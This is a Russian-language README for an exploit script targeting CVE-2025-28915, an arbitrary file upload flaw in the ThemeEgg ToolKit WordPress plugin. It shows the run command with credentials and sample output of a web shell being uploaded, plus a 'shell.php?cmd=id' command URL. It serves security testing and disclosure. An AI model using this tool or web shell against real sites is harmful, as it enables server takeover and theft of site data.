
Плагин WordPress ThemeEgg ToolKit <= 1.2.9 - Уязвимость произвольной загрузки файлов
Уязвимость неограниченной загрузки файлов в плагине ThemeEgg ToolKit для WordPress (версии ≤ 1.2.9) позволяет аутентифицированным злоумышленникам загружать веб-шеллы на сервер. Это может привести к удаленному выполнению кода (RCE), полному захвату веб-сайта и компрометации конфиденциальных данных.
Этот скрипт автоматизирует эксплуатацию CVE-2025-28915 путем:
requests, beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| Аргумент | Описание |
|---|---|
-u | Целевой URL WordPress (например, http://target.com/wordpress) |
-un | Имя пользователя WordPress |
-p | Пароль WordPress |
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
Этот скрипт предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование незаконно и неэтично. Автор не несет ответственности за неправомерное использование.
Автор: Khaled Alenazi (Nxploit)